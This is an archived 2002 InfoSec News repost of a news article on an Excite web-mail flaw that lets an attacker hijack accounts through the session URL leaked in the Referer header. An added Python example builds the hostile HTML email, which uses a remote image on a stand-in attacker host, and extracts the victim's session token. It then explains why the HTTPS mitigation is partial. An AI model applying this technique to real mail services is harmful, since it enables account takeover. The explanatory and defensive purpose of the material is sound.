[ISN] Excite in web mail hijack drama

From: InfoSec News (isnat_private)
Date: Fri Mar 22 2002 - 00:04:22 PST


    http://www.vnunet.com/News/1130317
    
    By James Middleton [21-03-2002]
    
    Security watchers have identified a vulnerability in the web mail
    service of internet portal Excite that allows for the hijacking of a
    user's account.
    
    According to the experts, when a user logs in to their account through
    Excite's web interface, the session is authenticated by a unique URL.
    
    By sending an HTML email which includes an image based on another
    server to the victim, an attacker can easily get the unique URL from
    the referrer field in the HTTP header.
    
    Simply pasting this into a web browser would drop the attacker
    straight into the victim's mailbox with complete control of the
    account.
    
    The exploit has been discussed to some degree on security mailing list
    Bugtraq, and Eyeonsecurity.net has even published a demonstration of
    the attack. Excite has been notified but has not yet responded.
    
    By way of combating the threat, Eyeonsecurity recommends using secure
    mode in the browser (HTTPS) to access Excite web mail. This prevents
    the referrer URL from being sent out.
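    The attack and the recommended mitigation, modelled in Python as an
    added example (this is not code from vnunet, Eyeonsecurity or Excite).
    The host names, the `sessid` query parameter and the request bytes are
    constructed for illustration; the article only says the session is
    "authenticated by a unique URL". The browser rule the mitigation relies
    on is the one in RFC 2616 section 15.1.3: a page fetched over HTTPS
    does not send Referer to a plain-HTTP resource.

```python
"""Referer-based leak of a URL-borne web-mail session (added example)."""
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Assumed name of the query parameter carrying the session token.
SESSION_PARAM = "sessid"

# Constructed URLs; not Excite's real hosts or paths.
WEBMAIL_HTTP = "http://webmail.example.net/mail/inbox?sessid=8f3c1a9e27b4"
WEBMAIL_HTTPS = "https://webmail.example.net/mail/inbox?sessid=8f3c1a9e27b4"
ATTACKER_IMG = "http://attacker.example.org/pixel.gif"


def hostile_email_html(image_url: str = ATTACKER_IMG) -> str:
    """HTML mail body with a remote image. Rendering it in web mail makes the
    victim's browser fetch image_url with the mailbox page as referrer."""
    return (
        "<html><body><p>Hi there</p>"
        f'<img src="{image_url}" width="1" height="1" alt="">'
        "</body></html>"
    )


def referer_is_sent(page_url: str, resource_url: str) -> bool:
    """Browser rule behind the HTTPS mitigation (RFC 2616 15.1.3): no Referer
    from a secure page to a non-secure resource; otherwise it is sent."""
    page, res = urlsplit(page_url), urlsplit(resource_url)
    if page.scheme == "https" and res.scheme != "https":
        return False
    return True


def browser_image_request(page_url: str, image_url: str) -> bytes:
    """Raw request the victim's browser sends to the image server."""
    img = urlsplit(image_url)
    lines = [f"GET {img.path or '/'} HTTP/1.0", f"Host: {img.netloc}"]
    if referer_is_sent(page_url, image_url):
        lines.append(f"Referer: {page_url}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def parse_headers(raw: bytes) -> dict:
    """Minimal request parser: lower-cased header name -> value.
    partition(':') keeps the colons inside the Referer URL intact."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    headers = {}
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def hijack_url(raw_request: bytes) -> Optional[str]:
    """What the attacker's image server logs: the Referer is itself the
    unique URL that drops the attacker into the victim's mailbox."""
    return parse_headers(raw_request).get("referer")


def session_token_from_referer(raw_request: bytes) -> Optional[str]:
    """Pull just the session token out of the leaked Referer, if any."""
    ref = hijack_url(raw_request)
    if not ref:
        return None
    vals = parse_qs(urlsplit(ref).query).get(SESSION_PARAM)
    return vals[0] if vals else None


if __name__ == "__main__":
    for page in (WEBMAIL_HTTP, WEBMAIL_HTTPS):
        req = browser_image_request(page, ATTACKER_IMG)
        print(urlsplit(page).scheme, "->", session_token_from_referer(req))
```

    Two caveats the model makes visible. The HTTPS mitigation only suppresses
    Referer towards a plain-HTTP image; an attacker who hosts the image on an
    HTTPS server still receives the referring URL under the same RFC 2616
    rule. And the underlying weakness is the session token living in the URL
    at all: a token carried in a cookie is never part of a Referer, whatever
    scheme the page was loaded over.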
    



    This archive was generated by hypermail 2b30 : Fri Mar 22 2002 - 03:39:34 PST